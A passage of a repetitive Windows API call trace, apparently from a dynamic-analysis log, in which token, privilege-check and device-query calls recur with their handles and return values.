(in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.082] SetLastError (dwErrCode=0x522) [0085.082] CloseHandle (hObject=0x114) returned 1 [0085.082] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.082] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.082] GetLastError () returned 0x578 [0085.082] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.082] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.082] GetCurrentThread () returned 0xfffffffe [0085.082] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.082] GetLastError () returned 0x3f0 [0085.082] GetCurrentProcess () returned 0xffffffff [0085.082] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.082] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.082] SetLastError (dwErrCode=0x522) [0085.082] CloseHandle (hObject=0x114) returned 1 [0085.082] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.083] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.083] GetLastError () returned 0x578 [0085.083] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.083] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.083] GetCurrentThread () returned 0xfffffffe [0085.083] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.083] GetLastError () returned 0x3f0 [0085.083] GetCurrentProcess () returned 0xffffffff [0085.083] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.083] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.083] SetLastError (dwErrCode=0x522) [0085.083] CloseHandle (hObject=0x114) returned 1 [0085.083] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.083] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.083] GetLastError () returned 0x578 [0085.083] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.083] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.083] GetCurrentThread () returned 0xfffffffe [0085.083] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.083] GetLastError () returned 0x3f0 [0085.083] GetCurrentProcess () returned 0xffffffff [0085.083] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.083] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.083] SetLastError (dwErrCode=0x522) [0085.083] CloseHandle (hObject=0x114) returned 1 [0085.083] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.083] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.083] GetLastError () returned 0x578 [0085.083] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.083] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.084] GetCurrentThread () returned 0xfffffffe [0085.084] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.084] GetLastError () returned 0x3f0 [0085.084] GetCurrentProcess () returned 0xffffffff [0085.084] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.084] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.084] SetLastError (dwErrCode=0x522) [0085.084] CloseHandle (hObject=0x114) returned 1 [0085.084] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.084] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.084] GetLastError () returned 0x578 [0085.084] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.084] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.084] GetCurrentThread () returned 0xfffffffe [0085.084] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.084] GetLastError () returned 0x3f0 [0085.084] GetCurrentProcess () returned 0xffffffff [0085.084] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.084] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.084] SetLastError (dwErrCode=0x522) [0085.084] CloseHandle (hObject=0x114) returned 1 [0085.084] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.084] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.084] GetLastError () returned 0x578 [0085.084] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.084] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.084] GetCurrentThread () returned 0xfffffffe [0085.084] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.084] GetLastError () returned 0x3f0 [0085.084] GetCurrentProcess () returned 0xffffffff [0085.084] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.084] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.084] SetLastError (dwErrCode=0x522) [0085.084] CloseHandle (hObject=0x114) returned 1 [0085.084] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.084] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.084] GetLastError () returned 0x578 [0085.085] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.085] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.085] GetCurrentThread () returned 0xfffffffe [0085.085] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.085] GetLastError () returned 0x3f0 [0085.085] GetCurrentProcess () returned 0xffffffff [0085.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.085] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.085] SetLastError (dwErrCode=0x522) [0085.085] CloseHandle (hObject=0x114) returned 1 [0085.085] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.085] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.085] GetLastError () returned 0x578 [0085.085] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.085] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.085] GetCurrentThread () returned 0xfffffffe [0085.085] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.085] GetLastError () returned 0x3f0 [0085.085] GetCurrentProcess () returned 0xffffffff [0085.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.085] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.085] SetLastError (dwErrCode=0x522) [0085.085] CloseHandle (hObject=0x114) returned 1 [0085.085] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.085] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.085] GetLastError () returned 0x578 [0085.085] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.085] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.085] GetCurrentThread () returned 0xfffffffe [0085.085] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.085] GetLastError () returned 0x3f0 [0085.085] GetCurrentProcess () returned 0xffffffff [0085.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.085] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.085] SetLastError (dwErrCode=0x522) [0085.085] CloseHandle (hObject=0x114) returned 1 [0085.086] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.086] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.086] GetLastError () returned 0x578 [0085.086] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.086] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.086] GetCurrentThread () returned 0xfffffffe [0085.086] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.086] GetLastError () returned 0x3f0 [0085.086] GetCurrentProcess () returned 0xffffffff [0085.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.086] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.086] SetLastError (dwErrCode=0x522) [0085.086] CloseHandle (hObject=0x114) returned 1 [0085.086] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.086] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.086] GetLastError () returned 0x578 [0085.086] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.086] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.086] GetCurrentThread () returned 0xfffffffe [0085.086] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.086] GetLastError () returned 0x3f0 [0085.086] GetCurrentProcess () returned 0xffffffff [0085.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.086] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.086] SetLastError (dwErrCode=0x522) [0085.086] CloseHandle (hObject=0x114) returned 1 [0085.086] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.086] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.086] GetLastError () returned 0x578 [0085.086] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.086] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.086] GetCurrentThread () returned 0xfffffffe [0085.086] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.086] GetLastError () returned 0x3f0 [0085.086] GetCurrentProcess () returned 0xffffffff [0085.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.087] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.087] SetLastError (dwErrCode=0x522) [0085.087] CloseHandle (hObject=0x114) returned 1 [0085.087] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.087] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.087] GetLastError () returned 0x578 [0085.087] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.087] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.087] GetCurrentThread () returned 0xfffffffe [0085.087] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.087] GetLastError () returned 0x3f0 [0085.087] GetCurrentProcess () returned 0xffffffff [0085.087] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.087] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.087] SetLastError (dwErrCode=0x522) [0085.087] CloseHandle (hObject=0x114) returned 1 [0085.087] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.087] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.087] GetLastError () returned 0x578 [0085.087] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.087] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.087] GetCurrentThread () returned 0xfffffffe [0085.087] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.087] GetLastError () returned 0x3f0 [0085.087] GetCurrentProcess () returned 0xffffffff [0085.087] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.087] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.087] SetLastError (dwErrCode=0x522) [0085.087] CloseHandle (hObject=0x114) returned 1 [0085.087] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.087] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.087] GetLastError () returned 0x578 [0085.087] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.087] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.087] GetCurrentThread () returned 0xfffffffe [0085.087] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.087] GetLastError () returned 0x3f0 [0085.087] GetCurrentProcess () returned 0xffffffff [0085.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.088] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.088] SetLastError (dwErrCode=0x522) [0085.088] CloseHandle (hObject=0x114) returned 1 [0085.088] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.088] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.088] GetLastError () returned 0x578 [0085.088] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.088] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.088] GetCurrentThread () returned 0xfffffffe [0085.088] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.088] GetLastError () returned 0x3f0 [0085.088] GetCurrentProcess () returned 0xffffffff [0085.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.088] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.088] SetLastError (dwErrCode=0x522) [0085.088] CloseHandle (hObject=0x114) returned 1 [0085.088] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.088] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.088] GetLastError () returned 0x578 [0085.088] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.088] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.088] GetCurrentThread () returned 0xfffffffe [0085.088] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.088] GetLastError () returned 0x3f0 [0085.088] GetCurrentProcess () returned 0xffffffff [0085.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.088] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.088] SetLastError (dwErrCode=0x522) [0085.088] CloseHandle (hObject=0x114) returned 1 [0085.088] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.088] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.088] GetLastError () returned 0x578 [0085.088] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.088] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.088] GetCurrentThread () returned 0xfffffffe [0085.089] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.089] GetLastError () returned 0x3f0 [0085.089] GetCurrentProcess () returned 0xffffffff [0085.089] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.089] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.089] SetLastError (dwErrCode=0x522) [0085.089] CloseHandle (hObject=0x114) returned 1 [0085.089] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.089] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.089] GetLastError () returned 0x578 [0085.089] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.089] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.089] GetCurrentThread () returned 0xfffffffe [0085.089] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.089] GetLastError () returned 0x3f0 [0085.089] GetCurrentProcess () returned 0xffffffff [0085.089] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.089] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.089] SetLastError (dwErrCode=0x522) [0085.089] CloseHandle (hObject=0x114) returned 1 [0085.089] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.089] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.089] GetLastError () returned 0x578 [0085.089] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.089] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.089] GetCurrentThread () returned 0xfffffffe [0085.089] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.089] GetLastError () returned 0x3f0 [0085.089] GetCurrentProcess () returned 0xffffffff [0085.089] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.089] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.089] SetLastError (dwErrCode=0x522) [0085.089] CloseHandle (hObject=0x114) returned 1 [0085.089] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.089] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.089] GetLastError () returned 0x578 [0085.090] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.090] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.090] GetCurrentThread () returned 0xfffffffe [0085.090] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.090] GetLastError () returned 0x3f0 [0085.090] GetCurrentProcess () returned 0xffffffff [0085.090] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.090] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.090] SetLastError (dwErrCode=0x522) [0085.090] CloseHandle (hObject=0x114) returned 1 [0085.090] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.090] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.090] GetLastError () returned 0x578 [0085.090] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.090] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.090] GetCurrentThread () returned 0xfffffffe [0085.090] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.090] GetLastError () returned 0x3f0 [0085.090] GetCurrentProcess () returned 0xffffffff [0085.090] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: 